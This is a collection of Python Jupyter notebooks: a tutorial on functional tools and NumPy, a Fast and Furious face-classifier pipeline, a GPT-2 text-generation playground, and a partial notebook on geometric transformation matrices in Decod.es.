https://docs.python.org/3/library/functions.html#zip ##### <b>`map(function, iterable, ...)`</b> - apply function to every element of an iterable - return iterable with results https://docs.python.org/3/library/functions.html#map ##### <b>`filter(function, iterable)`</b> - apply function (bool result) to every element of an iterable - return the elements from the input iterable for which the function returns True https://docs.python.org/3/library/functions.html#filter ##### <b>`functools.reduce(function, iterable[, initializer])`</b> - apply function to every element of an iterable to reduce the iterable to a single value https://docs.python.org/3/library/functools.html#functools.reduce ``` combined_res = zip([10,20,30],["ACT","GGT","AACT"],[True,False,True]) combined_res for element in combined_res: print(element) list(combined_res) # unzip list x, y, z = zip(*[(3,4,7), (12,15,19), (30,60,90)]) print(x, y, z) ``` _____ ``` map(abs,[-2,0,-5,6,-7]) list(map(abs,[-2,0,-5,6,-7])) ``` https://www.geeksforgeeks.org/python-map-function/ ``` numbers1 = [1, 2, 3] numbers2 = [4, 5, 6] result = map(lambda x, y: x + y, numbers1, numbers2) list(result) ``` ____ Use a lambda function and the map function to compute a result from the following 3 lists.<br> If the element in the third list is divisible by 3 return 3*x, otherwise return 2*y. 
``` numbers1 = [1, 2, 3, 4, 5, 6] numbers2 = [7, 8, 9, 10, 11, 12] numbers3 = [13, 14, 15, 16, 17, 18] result = map(lambda x, y, z: 3*x if z%3 ==0 else 2*y, \ numbers1, numbers2, numbers3) list(result) def compute_res(x,y,z): res = None if z%3 == 0: res = 3*x else: res = 2*y return res result = map(compute_res, numbers1, numbers2, numbers3) list(result) ``` ____ ``` test_list = [3,4,5,6,7] result = filter(lambda x: x > 4, test_list) result list(result) # Filter to remove empty structures or 0 test_list = [3, 0, 5, None, 7, "", "AACG", []] result = filter(bool, test_list) list(result) ``` ____ ``` from functools import reduce reduce(lambda x,y: x+y, [47,11,42,13]) ``` <img src = https://www.python-course.eu/images/reduce_diagram.png width=300/> https://www.python-course.eu/lambda.php https://www.geeksforgeeks.org/reduce-in-python/ https://www.tutorialsteacher.com/python/python-reduce-function ``` test_list = [1,2,3,4,5,6] # compute factorial of n n=5 reduce(lambda x, y: x*y, range(1, n+1)) ``` _____ ### Input/Output and File Handling #### Reading user input: the `input()` function ``` # reads text, evaluates expression res = input() while res != "STOP": print("input", res) res = input() ``` File is a named location on disk to store related information It is used to permanently store data in a non-volatile memory (e.g. 
hard disk)<br> https://www.programiz.com/python-programming/file-operation #### Open a file for reading or writing https://docs.python.org/3/library/functions.html#open ```python open(file, mode='r', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None) fileObj = open(fileName, 'r') # open file for reading, r+ fileObj = open(fileName, 'w') # open file for writing, w+ fileObj = open(fileName, 'a') # open file for appending, a+ ``` (Note: fileName must be a string or reference to one) The file object is iterable by line ``` #help(open) ``` <b>Write</b> ``` # open file and write lines into a file test_file = open("test.txt", mode = "w") test_file.write("Writing some text.\n") test_file.write("Writing another line.") test_file.close() for elem in dir(test_file): if "_" not in elem: print(elem) ``` <b>Close file</b> ``` # close() help(test_file.close) ``` <b>Read</b> ``` # open file and read file contents test_file = open("test.txt", "r") res = test_file.read() print(res) test_file.close() ``` <b>Read line</b> ``` test_file = open("test.txt", "r") res = test_file.readlines() print(res) test_file.close() ``` <b>Go at position</b> ``` # seek test_file = open("test.txt", "r") test_file.seek(10) res = test_file.readline() print(res) print(test_file.tell()) test_file.close() ``` <b>Return current position</b> ``` # tell ``` ### Context manager <b>with: give code context</b> The special part about with is when it is paired with file handling or database access functionality ``` # Without with test_file = open("test.txt",'r') print(test_file.read()) test_file.close() # With with :) with open("test.txt",'r') as test_file: print(test_file.read()) ``` The file is opened and processed. <br> As soon as you exit the with statement, <b>the file is closed automatically</b>. 
``` # parsing files def parse_line(line): return line.strip().split(" ") with open("test.txt",'r') as test_file: line = test_file.readline() while (line != ""): print(parse_line(line)) line = test_file.readline() ``` ### <font color = "red">Exercise</font>: Open the file test.txt and add 10 lines in a for loop. The line should contain: Line index Line 0 Line 1 https://www.tutorialspoint.com/python/python_files_io.htm https://www.tutorialspoint.com/python/file_methods.htm _____ ### NumPy - Numeric python <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/1a/NumPy_logo.svg/1200px-NumPy_logo.svg.png" alt="NumPy logo" width = "100"> NumPy (np) is the premier Python package for scientific computing https://numpy.org Its power comes from the <b>N-dimensional array object</b> np is a *lower*-level numerical computing library. This means that, while you can use it directly, most of its power comes from the packages built on top of np: * Pandas (*Pan*el *Da*ta) * Scikit-learn (machine learning) * Scikit-image (image processing) * OpenCV (computer vision) * more... 
<b>Importing NumPy<br> Convention: use np alias</b> ``` import numpy as np ``` <img src="https://www.oreilly.com/library/view/elegant-scipy/9781491922927/assets/elsp_0105.png" alt="data structures" width="500"> <b>NumPy basics</b> Arrays are designed to: * handle vectorized operations lists are not * if you apply a function it is performed on every item in the array, rather than on the whole array object * store multiple items <b>of the same data type</b> * have 0-based indexing * Missing values can be represented using `np.nan` object * the object `np.inf` represents infinity * Array size cannot be changed, should create a new array * An equivalent numpy array occupies much less space than a python list of lists <b>Create Array</b><br> https://docs.scipy.org/doc/numpy-1.13.0/user/basics.creation.html ``` # Build array from Python list vector = np.array([1,2,3]) vector # matrix with zeros np.zeros((3,4), dtype = int) # matrix with 1s np.ones((3,4), dtype=int) # matrix with a constant value value = 20 np.full((3,4), value) # Create a 4x4 identity matrix np.eye(4) # arange - numpy range np.arange(10, 30, 2) # evenly spaced numbers over a specified interval ev_array = np.linspace(1, 10, 20) print(ev_array) ev_array.shape ``` <b>Random data</b><br> https://docs.scipy.org/doc/numpy-1.13.0/reference/routines.random.html ``` # Create an array filled with random values np.random.random((3,4)) # Create an array filled with random values from the standard normal distribution np.random.randn(3,4) # Generate the same random numbers every time # Set seed np.random.seed(10) np.random.randn(3,4) np.random.seed(10) print(np.random.randn(3,4)) print(np.random.randn(3,4)) np.random.seed(100) print(np.random.randn(3,4)) ``` ```python # Create the random state rs = np.random.RandomState(100) ``` <b>Basic array attributes:</b> * shape: array dimension * size: Number of elements in array * ndim: Number of array dimensions (len(arr.shape)) * dtype: Data-type of the array * T: The transpose 
of the array ``` matrix = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]]) matrix # let's check them out matrix.shape matrix.size matrix = np.array([[[1,2],[2,3],[3,4]],[[4,5],[4,6],[6,7]]]) matrix.ndim matrix.dtype matrix.T matrix ``` <b>Reshaping</b> ``` matrix # Reshaping matrix_reshaped = matrix.reshape(2,6) matrix_reshaped ``` <b>Slicing/Indexing</b> ``` # List-like matrix_reshaped[1][1] matrix_reshaped[1,3] matrix_reshaped[1,:3] matrix_reshaped[:2,:3] # iterrating ... let's print the elements of matrix_reshaped nrows = matrix_reshaped.shape[0] ncols = matrix_reshaped.shape[1] for i in range(nrows): for j in range(ncols): print(matrix_reshaped[i,j]) # Fun arrays checkers_board = np.zeros((8,8),dtype=int) checkers_board[1::2,::2] = 1 checkers_board[::2,1::2] = 1 print(checkers_board) ``` Create a 2d array with 1 on the border and 0 inside ``` boarder_array = np.zeros((8,8),dtype=int) boarder_array[0,:] = 1 boarder_array boarder_array = np.ones((8,8),dtype=int) boarder_array[1:-1,1:-1] = 0 boarder_array boarder_array[:,-1] ``` <b>Performance</b> test_list = list(range(int(1e6))) <br> test_vector = np.array(test_list) ``` test_list = list(range(int(1e6))) test_vector = np.array(test_list) %%timeit sum(test_list) %%timeit np.sum(test_vector) ``` https://numpy.org/devdocs/user/quickstart.html#universal-functions <b>Matrix operations</b> https://www.tutorialspoint.com/matrix-manipulation-in-python<br> Arithmetic operators on arrays apply elementwise. <br> A new array is created and filled with the result. <b>Array broadcasting</b><br> https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html<br> The term broadcasting describes how numpy treats arrays with different shapes during arithmetic operations. <br> Subject to certain constraints, the smaller array is “broadcast” across the larger array so that they have compatible shapes. 
<img src = "https://www.tutorialspoint.com/numpy/images/array.jpg" height=10/> https://www.tutorialspoint.com/numpy/numpy_broadcasting.htm ``` matrix np.array([1,2,3,4]).reshape(4,1) matrix + np.array([1,2,3,4]).reshape(4,1) matrix + np.array([1,2,3]) matrix * np.array([1,2,3,4]).reshape(4,1) matrix2 = np.array([[1,2,3],[5,6,7],[1,1,1],[2,2,2]]) matrix2 matrix * matrix2 # matrix multiplication matrix.dot(np.array([1,2,3]).reshape(3,1)) # matrix multiplication - more recently matrix@(np.array([1,2,3]).reshape(3,1)) # stacking arrays together np.vstack((matrix,matrix2)) np.hstack((matrix,matrix2)) # splitting arrays np.vsplit(matrix,2) np.hsplit(matrix,(2,3)) ``` <b>Copy</b> ``` matrix # shallow copy - looks at the same data matrix_copy = matrix matrix_copy1 = matrix.view() print(matrix_copy) print(matrix_copy1) print(matrix) print(matrix_copy) print(matrix_copy1) matrix_copy1[0,0] = 5 # deep copy matrix_copy2 = matrix.copy() print(matrix_copy2) matrix_copy2[0,0] = 7 print(matrix) print(matrix_copy) print(matrix_copy1) print(matrix_copy2) ``` <b>More matrix computation</b> ``` # conditional subsetting matrix[(6 < matrix[:,0])] matrix[(4 <= matrix[:,0]) & (matrix[:,0] <= 7) & (2 <= matrix[:,1]) & (matrix[:,1] <= 7),] matrix # col mean matrix.mean(axis = 0) # row mean matrix.mean(axis = 1) # unique values and counts matrix = np.random.random((3,4), ) matrix = np.array([[ 5, 2, 3], [ 4, 5, 6], [ 7, 8, 9], [10, 11, 12]]) uvals, counts = np.unique(matrix, return_counts=True) print(uvals,counts) ``` https://www.w3resource.com/python-exercises/numpy/index.php Create a matrix of 5 rows and 6 columns with numbers from 1 to 30. Add 2 to the odd values of the array. ``` matrix = np.arange(1,31).reshape(5,6) matrix[matrix%2==1 ] += 2 matrix ``` Normalize the values in the matrix. Subtract the mean and divide by the standard deviation. 
``` mat_mean = np.mean(matrix) mat_std = np.std(matrix) matrix_norm = (matrix - mat_mean)/mat_std matrix_norm matrix ``` Create a random array (5 by 3) and compute: * the sum of all elements * the sum of the rows * the sum of the columns ``` matrix = np.random.rand(5,3) print(matrix) matrix.sum() matrix.sum(1) matrix.sum(0) #Given a set of Gene Ontology (GO) terms and the genes that are associated with these terms find the gene #that is associated with the most GO terms go_terms=np.array(["cellular response to nicotine", "cellular response to hypoxia", "cellular response to lipid"]) genes=np.array(["BAD","KCNJ11","MSX1","CASR","ZFP36L1"]) assoc_matrix = np.array([[1,1,0,1,0],[1,0,0,1,1],[1,0,0,0,0]]) print(assoc_matrix) max(assoc_matrix.sum(0)) genes[0] ```
github_jupyter
# Too Fast. Too Furious. (AKA This Week.) **Goal:** Build a classification model to classify unseen faces to 'match' those of characters from the beloved _**Fast and Furious**_ movie franchise. ``` # # Required installations (run once) # !brew install wget # Added by Miles # !pip install --upgrade --ignore-installed wrapt # Added by Miles # !pip install tensorflow==2.0.0-beta0 # Edited by Miles (switch to CPU version) # !pip install tensorflow_datasets # Added by Miles %matplotlib inline %load_ext autoreload %autoreload 2 # 1 would be where you need to specify the files #%aimport helper #%aimport image_feature_extractor ``` ## Import Libraries ``` import os import numpy as np from io import BytesIO # Visualization import matplotlib.pyplot as plt # ML import tensorflow as tf keras = tf.keras from sklearn.model_selection import train_test_split from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import BaggingClassifier, RandomForestClassifier from sklearn.metrics import (accuracy_score, confusion_matrix , classification_report) from sklearn.pipeline import Pipeline import pickle import dill import joblib # Image handling from PIL import Image # Data storage import boto3 # AWS import pymongo # MongoDB # Custom import helper # Helper functions from image_feature_extractor import ImageFeatureExtractor ``` ## Data Procurement To set up our data ingestion process, we centralized all our images to a local folder. They are also stored on an **AWS S3 bucket**. #### Future Improvement - Revise to pull directly from s3 bucket. 
``` image_paths = [] target_labels = [] for dirpath, dirnames, filenames in os.walk('downloads/all_photos'): #for dirpath, dirnames, filenames in os.walk('test_data'): for ff in filenames: if ff[:1] != '.': curr_path = os.path.join('.',dirpath, ff) temp_name = dirpath[dirpath.rfind('/') + 1:] target_labels.append(temp_name) image_paths.append(curr_path) ``` ## Machine Learning Pipeline We constructed a pipeline that consists of the following: - We created a class that uses a pre-trained model (MobileNetV2) to extract features. - A Random Forest classifier built on top of those extracted features. ``` # Instantiate our feature extractor extractor = ImageFeatureExtractor() # Instantiate our chosen classification model #forest = RandomForestClassifier(n_estimators=10, n_jobs=-1) forest = RandomForestClassifier(n_estimators=10) # Create the ML pipeline pipe = Pipeline([ ('extract_deep_features', extractor), ('classify', forest) ]) # Create train/test split X_train, X_test, y_train, y_test = train_test_split(image_paths ,target_labels ,random_state=57 ,stratify=target_labels) # Fit on training data! pipe.fit(X_train, y_train) pipe.predict(X_test) pipe.score(X_test, y_test) pipe.score(X_train, y_train) ``` ### Test URL Inputs ``` # Random Testing vinny = ['http://www.sosia.biz/files/immagini/1289210942-DSCF0851.JPG'] laura = ['https://cdn-images-1.medium.com/max/1200/1*jM7PrjvG20306cXwjgN6' + 'hA@2x.jpeg'] mia = ['https://media.licdn.com/dms/image/C4E03AQEUu7pgy0zqrw/profile-' + 'displayphoto-shrink_200_200/0?e=1563408000&v=beta&t=IQESr0Ho16othge' + 'TRgp0nrGlXRkv6c-WiSHf_nCzRlk'] werlindo = ['https://cdn-images-1.medium.com/max/1200/2*T33SKqm3ldv2QkT' + 'E3QQ0Dw.jpeg'] pipe.predict(vinny) pipe.predict(laura) pipe.predict(mia) pipe.predict(werlindo) ``` ### In A Pickle. So it appears at this moment can't **pickle** a **pipeline** with a **Keras model** embedded in it, so will adjust to just **pickle the Random Forest**. 
``` # Extract the random forest model = pipe.named_steps['classify'] type(model) pkl_model_filenm = 'model.pkl' ``` Create the pickled file: ``` with open(pkl_model_filenm, 'wb') as file: pickle.dump(model, file) ``` Testing loading of the pickled file: ``` # Load from file with open(pkl_model_filenm, 'rb') as file: pickle_model = pickle.load(file) type(pickle_model) features_for_web = extractor.transform(werlindo) ``` # Issues with Pickling the Pipeline ### Encountered Errors: - can't pickle _thread.RLock objects - can't pickle SwigPyObject objects ### Info? - [Keras models not pickle-able?](https://github.com/keras-team/keras/issues/10528) ``` # Save to file in the current working directory pkl_model_filenm = "model.pkl" ``` ### Try 1 - Pickle https://pypi.org/project/dill/ ``` with open(pkl_model_filenm, 'wb') as file: pickle.dump(pipe, file) # Load from file with open(pkl_model_filenm, 'rb') as file: pickle_model = pickle.load(file) ``` ##### Calculate the accuracy score and predict target values score = pickle_model.score(X_test, y_test) print("Test score: {0:.2f} %".format(100 * score)) predict = pickle_model.predict(X_test) ### Try 2 - Dill https://pypi.org/project/dill/ ``` with open(pkl_model_filenm, "wb") as dill_file: dill.dump(pipe, dill_file) ``` ### Try 3 - joblib https://scikit-learn.org/stable/modules/model_persistence.html ``` # Export the classifier to a file joblib.dump(pipe, 'model.joblib') ``` ### Try 4 - joblib 'hack'? https://stackoverflow.com/questions/37984304/how-to-save-a-scikit-learn-pipline-with-keras-regressor-inside-to-disk ``` # Save the Keras model first: # pipeline.named_steps['estimator'].model.save('keras_model.h5') pipe.named_steps['extract_deep_features'].model.save('deep_feat') # This hack allows us to save the sklearn pipeline: pipe.named_steps['classify'].model = None # Finally, save the pipeline: joblib.dump(pipe, 'model.pkl') ``` --- --- # Appendix ## Development on MongoDB storage. Not currently implemented. 
Intended to eventually be integrated into the **ImageFeatureExtractor()** class. ``` # Instantiate Class extractor = ImageFeatureExtractor() # Store Features - list of arrays features = extractor.transform(image_paths) # Turn into list of lists because easier with MongoDB features_list = [feature.tolist() for feature in features] # Zip them so can iterate through them zipped_imgs = list(zip(image_paths,features_list)) # Create list of dictionaries; so can be ingested by MongoDB list_of_dicts = [{'url': img[0], 'features':img[1]} for img in zipped_imgs] ``` ### Upload results to MongoDB ``` # Define path to secret #secret_path = os.path.join(os.environ['HOME'], '.secret', 'mongo.json') # keys = helper.get_keys(secret_path) # mongo_user = keys['user_id'] # mongo_pw = keys['password'] # Instantiate client client = pymongo.MongoClient("mongodb+srv://" + mongo_user + ":" + mongo_pw + "@dsaf-oy1s0.mongodb.net/test?retryWrites=true") # Get DB, Collection db = client['furious'] coll = db['images'] # Wipe collection to start fresh coll.delete_many({}) # Insert Results coll.insert_many(list_of_dicts) ``` ### Testing getting the features back ``` features_returned = [np.array(x['features']) for x in coll.find()] features_returned ``` --- ## Development: Classification Models ``` target = target_labels X_train, X_test, y_train, y_test = train_test_split(features, target, test_size = 0.25, random_state=123) ``` ### Development: Decision Trees ``` tree_clf = DecisionTreeClassifier(criterion = "gini", max_depth = 5) tree_clf.fit(X_train, y_train) tree_clf.feature_importances_ pred = tree_clf.predict(X_test) print(confusion_matrix(y_test, pred)) print(classification_report(y_test, pred)) ``` ### Random Forest ``` forest = RandomForestClassifier(n_estimators=20) forest.fit(X_train, y_train) forest.score(X_train, y_train) forest.score(X_test, y_test) forest.predict(X_train) ```
github_jupyter
<a href="https://colab.research.google.com/github/ilopezfr/gpt-2/blob/master/gpt-2-playground_.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # GPT-2 Playground ## Background In this Jupyter notebook you can play around with of **Open AI's GPT-2** Language Model from the paper **[Language Models are Unsupervised Multitask Learners](https://d4mucfpksywv.cloudfront.net/better-language-models/language-models.pdf)**. You'll be able to choose between the small (**117M** parameters) , medium (**345M** parameters), large (**774M** parameters) and XL versions (**1.5B** parameters) version of GPT-2. According to the authors, the GPT-2 algorithm was trained on the task of *language modeling*--- which tests a program's ability to predict the next word in a given sentence--by ingesting huge numbers of articles, blogs, and websites. By using just this data it achieved state-of-the-art scores on a number of unseen language tests, an achievement known as *zero-shot learning.* It can also perform other writing-related tasks, like translating text from one language to another, summarizing long articles, and answering trivia questions. Open AI decided not to release the dataset, training code, or the full GPT-2 model weights. This is due to the concerns about large language models being used to generate deceptive, biased, or abusive language at scale. Some examples of the applications of these models for malicious purposes are: * Generate misleading news articles * Impersonate others online * Automate the production of abusive or faked content to post on social media * Automate the production of spam/phishing content As one can imagine, this combined with recent advances in generation of synthetic imagery, audio, and video implies that it's never been easier to create fake content and spread disinformation at scale. The public at large will need to become more skeptical of the content they consume online. 
---- **PRs to improve the notebook are welcomed !** ---- ## Steps Before starting, **set *Runtime Type* to *GPU*** on the top menu bar. ###1. Installation Clone the repo, install dependencies, and download the model weights. You can choose between the small 117M, medium 345M, large 774M model, xl 1.5B model or all of them. ``` !git clone https://github.com/ilopezfr/gpt-2/ import os os.chdir('gpt-2') #Download model weights # !python download_model.py 117M # !python download_model.py 345M # !python download_model.py 774M !python download_model.py 1558M # XL Model ``` **UPDATE: 02/02/2021: Install older TensorFlow version** Source code relies on older TensorFlow version. Installing TF v1.15 seems to fix the issue of *ModuleNotFoundError when training the model*. (Workaround found here: https://colab.research.google.com/notebooks/tensorflow_version.ipynb#scrollTo=8UvRkm1JGUrk) ``` %tensorflow_version 1.x # !pip -q install tensorflow==1.15 && pip -q install tensorflow-gpu==1.15 # !pip -q install 'tensorflow-estimator<1.15.0rc0,>=1.14.0rc0' --force-reinstall import tensorflow print(tensorflow.__version__) import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # disable all debugging logs !pip3 -q install -r /content/gpt-2/reqs.txt #!pip3 -q install -r /content/gpt-2/requirements.txt ``` ### 2. Unconditional sample generation *WARNING: Samples are unfiltered and may contain offensive content.* To generate unconditional samples from the small model: ``` !python3 src/generate_unconditional_samples.py ``` There are a few flags available, with a default value: - `model_name = '1558M' ` : choose between 117M, 345M, 774M, and 1558M models. If not specified, the default is 117M. - `seed = None` || a random value is generated unless specified. give a specific integer value if you want to reproduce same results in the future. - `nsamples = 1` || specify the number of samples you want to print - `length = None` || number of tokens (words) to print on each sample. 
- `batch_size= 1` || how many inputs you want to process simultaneously. *only affects speed/memory* - `temperature = 1` || float between 0 and 1. scales logits before sampling prior to softmax. higher temperature results in more random completions. - `top_k = 0` || Integer value controlling diversity. Truncates the set of logits considered to those with the highest values. 1 means only 1 word is considered for each step (token), resulting in deterministic completions. 40 means 40 words are considered at each step. 0 (default) is a special setting meaning no restrictions. 40 generally is a good value. *Note: This part takes a while (~5min) until it starts printing gpt2 samples* ``` !python3 src/generate_unconditional_samples.py --model_name='1558M' --nsamples=2 --top_k=40 --temperature=0.7 | tee samples !python3 src/generate_unconditional_samples.py --model_name='1558M' --nsamples=2 --top_k=2 !python3 src/generate_unconditional_samples.py --nsamples=2 --top_k=80 ``` ## Conditional sample generation To generate conditional samples from the small model: ``` !python3 src/interactive_conditional_samples.py ``` It comes with a few flags available, with a default value: - `model_name = '117M' ` : choose between 117M and 345M models. By default is 117M. - `seed = None` || a random value is generated unless specified. give a specific integer value if you want to reproduce same results in the future. - `nsamples = 1` || specify the number of samples you want to print - `length = None` || number of tokens (words) to print on each sample. - `batch_size= 1` || how many inputs you want to process simultaneously. *only affects speed/memory* - `temperature = 1` || float between 0 and 1. scales logits before sampling prior to softmax. higher temperature results in more random completions. - `top_k = 0` || Integer value controlling diversity. Truncates the set of logits considered to those with the highest values. 
1 means only 1 word is considered for each step (token), resulting in deterministic completions. 40 means 40 words are considered at each step. 0 (default) is a special setting meaning no restrictions. 40 generally is a good value. The authors tested the model performance on a few different language tasks, including **reading comprehension, text completion, summarization, translation, and question-answering.** Below are a few examples selected to test the aforementioned behaviors: ### 1. Text Completion - Context: random unseen text Sample prompt 1: ``` In a shocking finding, scientist discovered a herd of unicorns living in a remote, previously unexplored valley, in the Andes Mountains. Even more surprising to the researchers was the fact that the unicorns spoke perfect English. ``` Sample prompt 2: ([*Voight-Kampff test*](https://www.youtube.com/watch?v=Umc9ezAyJv0)) ``` You're in a desert, walking along in the sand, when all of a sudden you look down and see a tortoise, Leon. It's crawling toward you. You reach down, you flip the tortoise over on its back. The tortoise lays on its back, its belly baking in the hot sun, beating its legs trying to turn itself over, but it can’t, not without your help. But you’re not helping. Why is that? ``` Sample prompt 3: ``` I've seen things you people wouldn't believe. Attack ships on fire off the shoulder of Orion. I watched C-beams glitter in the dark near the Tannhäuser Gate. All those moments will be lost in time, like tears in rain. Time to die. ``` Sample prompt 4: ``` Outfit 1: Typical This pairing was the first outfit I thought of when I bought the shoes. It’s like a summer version of this Jake Grantham outfit; in fact, my shoes are close to the colors of his Nike Racers! Instead of a heavy Harris Tweed jacket and denim shirt, I’m wearing a cotton DB jacket and and a linen shirt. Both fabrics (in these colors) are an absolute must for summer, as they go with both dark and and light pants! 
As you can see, they pair wonderfully with the dark jeans and shoes. It’s a pseudo menswear/prep outfit. Overall, this is a very casual outfit which is why I paired my sneakers with it. I’m not about wearing a full wool suit with sneakers (as GQ shows a lot) but I’m definitely open to keeping things casual, like this cotton DB. Casual fabrics are key to pulling off your sneakers in a dressed down menswear outfit. I’d even suggest to wear these sneakers with a khaki chino suit or a white linen suit. Just be sure to ditch the tie or wear a tee or polo; wearing a tie with sneakers is a bit too much ``` Sample prompt 5: ``` - Some of the most glorious historical attractions in Spain date from the period of Muslim rule, including The Mezquita, built as the Great Mosque of Cordoba and the Medina Azahara, also in Cordoba, the Palace of al-Andalus; and the Alhambra in Granada, a splendid, intact palace. ``` Sample prompt 6: ``` How can Artificial Intelligence be dangerous? Most researchers agree that a superintelligent AI is unlikely to exhibit human emotions like love or hate, and that there is no reason to expect AI to become intentionally benevolent or malevolent. Instead, when considering how AI might become a risk, experts think two scenarios most likely: ``` Sample prompt 7: ``` Our solar system consists of the inner and outer planets, separated by an asteroid belt. It has ``` Sample prompt 8: ``` The 10 best foods are: 1. Serrano Ham 2. Manchego Cheese 3. ``` Sample prompt 9: ``` Real Madrid boss Santiago Solari admitted his team put in a 'weak performance' in their 1-0 Copa del Rey loss to local rivals Leganes. Despite losing the game, Los Blancos will progress to the quarter final stages of the tournament, winning the tie 3-1 on aggregate thanks to a 3-0 victory in the first leg. 
"It was a difficult game, but the performance was weak," Real Madrid boss Santi Solari on the ``` Sample prompt 10: ``` Roses are read, violets are blue, ``` ``` !python3 src/interactive_conditional_samples.py --model_name='1558M' --nsamples=2 --top_k=40 --temperature=.80 !python3 src/interactive_conditional_samples.py --model_name='345M' --nsamples=2 --top_k=100 --temperature=1 ``` ### 2. Question-Answering - Context: passage, some question/answer pairs, and token `A:` - For a single word answer (i.e.: Yes/No, city), set flag `length=1` Sample prompt 1 ([*The Baseline test*](https://bladerunner.fandom.com/wiki/Baseline_Test)) ``` Q: What's it like to hold the hand of someone you love? A: Interlinked. Q: Do they teach you how to feel finger to finger? A: Interlinked. Q: Do you long for having your heart interlinked? A: ``` Sample prompt 2: ``` The 2008 Summer Olympics torch relay was run from March 24 until August 8, 2008, prior to the 2008 Summer Olympics, with the theme of “one world, one dream”. Plans for the relay were announced on April 26, 2007, in Beijing, China. The relay, also called by the organizers as the “Journey of Harmony”, lasted 129 days and carried the torch 137,000 km (85,000 mi) – the longest distance of any Olympic torch relay since the tradition was started ahead of the 1936 Summer Olympics. After being lit at the birthplace of the Olympic Games in Olympia, Greece on March 24, the torch traveled to the Panathinaiko Stadium in Athens, and then to Beijing, arriving on March 31. From Beijing, the torch was following a route passing through six continents. The torch has visited cities along the Silk Road, symbolizing ancient links between China and the rest of the world. The relay also included an ascent with the flame to the top of Mount Everest on the border of Nepal and Tibet, China from the Chinese side, which was closed specially for the event. Q: What was the length of the race? A: 137,000 km Q: Was it larger than previous ones? 
A: No Q: Where did the race begin? A: Olympia, Greece Q: Where did they go after? A: Athens Q: How many days was the race? A: seven Q: Did they visit any notable landmarks? A: Panathinaiko Stadium Q: And did they climb any mountains? A: ``` ``` !python3 src/interactive_conditional_samples.py --model_name='345M' --nsamples=10 --top_k=40 --temperature=.80 --length=1 ``` ### 3. Summarization - Context: article and text *`TL;DR:`* or *`Summary:`* at the end. Sample prompt: ``` Theodore McCarrick is the most senior Catholic figure to be dismissed from the priesthood in modern times. US Church officials said allegations he had sexually assaulted a teenager five decades ago were credible. Mr McCarrick, 88, had previously resigned but said he had "no recollection" of the alleged abuse. "No bishop, no matter how influential, is above the law of the Church," Cardinal Daniel DiNardo, president of the United States Conference of Catholic Bishops said in a statement. "For all those McCarrick abused, I pray this judgment will be one small step, among many, toward healing." The alleged abuses may have taken place too long ago for criminal charges to be filed because of the statute of limitations. Mr McCarrick was the archbishop of Washington DC from 2001 to 2006. Since his resignation last year from the College of Cardinals, he has been living in seclusion in a monastery in Kansas. He was the first person to resign as a cardinal since 1927. He is among hundreds of members of the clergy accused of sexually abusing children over several decades and his dismissal comes days before the Vatican hosts a summit on preventing child abuse. The Vatican said Pope Francis had ruled Mr McCarrick's expulsion from the clergy as definitive, and would not allow any further appeals against the decision. TL;DR: ``` ``` !python3 src/interactive_conditional_samples.py --nsamples=3 --length=100 --temperature=1 ``` ### 4. 
Translation - Context: a few example pairs of the format *`english_sentence = spanish_sentence`*, and then *`english_sentence =`* at the end. Sample prompt: ``` Good morning. = Buenos días. I am lost. Where is the restroom? = Estoy perdido. ¿Dónde está el baño? How much does it cost? = ¿Cuánto cuesta? How do you say maybe in Spanish? = ¿Cómo se dice maybe en Español? Would you speak slower, please. = Por favor, habla mas despacio. Where is the book store? = ¿Dónde está la librería? At last a feminist comedian who makes jokes about men. = Por fin un cómico feminista que hace chistes sobre hombres. How old are you? = ``` ``` !python3 src/interactive_conditional_samples.py --model_name='345M' --nsamples=3 --temperature=1 ```
github_jupyter
``` from decodes.core import * from decodes.io.jupyter_out import JupyterOut import math out = JupyterOut.unit_square( ) ``` # Transformations in Code todo ## Xform Objects in Decod.es <img src="http://geometric-computation-images.s3-website-us-east-1.amazonaws.com/3.00.D96 Xform Large.jpg" style="width: 600px; display: inline;"> ``` """ Xform Initialization An Xform object is initialized with values configured to match those of an identity matrix. """ class Xform(object): def __init__(self): self._m = [0.0]*16 self.c11, self.c22, self.c33, self.c44, = 1.0, 1.0, 1.0, 1.0 """ Transformation Management Here, a method is defined that attempts to apply a spatial transformation as described by this Xform matrix to any geometric object given. An appropriate mechanism for doing so is applied on a case-by-case basis, with constituent Points and Vecs transformed separately, stripping away the translation portion of the matrix where needed. If no appropriate means is defined, an error is raised. """ def transform(self,other): # if other is a Point if isinstance(other, Point): # apply the transformation and return a new Point tup = self._xform_tuple(other.to_tuple()) pt = Point(tup[0],tup[1],tup[2]) return pt # if other is a Vec if isinstance(other, Vec): # apply the transformation and return a new Vec tup = self._xform_tuple(other.to_tuple()) vec = Vec(tup[0],tup[1],tup[2]) return vec # if other is a LinearEntity if isinstance(other, LinearEntity): # apply the transformation to the LinearEntity start point other._pt = other._pt*self xf = self.strip_translation() # apply the transformation to the LinearEntity vector other._vec = other._vec*xf # assemble and return a new LinearEntity return other # if other is a CS if isinstance(other, CS): cs = other # apply the transformation to the CS origin tup = self._xform_tuple(cs.origin.to_tuple()) origin = Point(tup[0],tup[1],tup[2]) xf = self.strip_translation() # apply the transformation to each of the CS axis Vecs tup = 
xf._xform_tuple(cs.x_axis.to_tuple()) x_axis = Vec(tup[0],tup[1],tup[2]) tup = xf._xform_tuple(cs.y_axis.to_tuple()) y_axis = Vec(tup[0],tup[1],tup[2]) # assemble and return a new CS ret = CS(origin, x_axis, y_axis) return ret # if other is a Circle if isinstance(other, Circle): # apply the transformation as if this Circle was a Plane pln = other.plane * self cir = Circle(pln,other.rad) # assemble and return a new Circle return cir # if other is a Plane if isinstance(other, Plane): pln = other # apply the transformation to the Plane origin tup = self._xform_tuple(pln.origin.to_tuple()) origin = Point(tup[0],tup[1],tup[2]) xf = self.strip_translation() # apply the transformation to the Plane normal Vec tup = xf._xform_tuple(pln.normal.to_tuple()) normal = Vec(tup[0],tup[1],tup[2]).normalized() # assemble and return a new Plane pln = Plane(origin, normal) pln.copy_props(other) return pln # if no transformation is defined for this object, raise an error. raise NotImplementedError("I'm sorry. I can't transform that.") """ A Rotation of a Segment Following an earlier example that defined a matrix for rotating vectors, a given Segment seg is rotated by 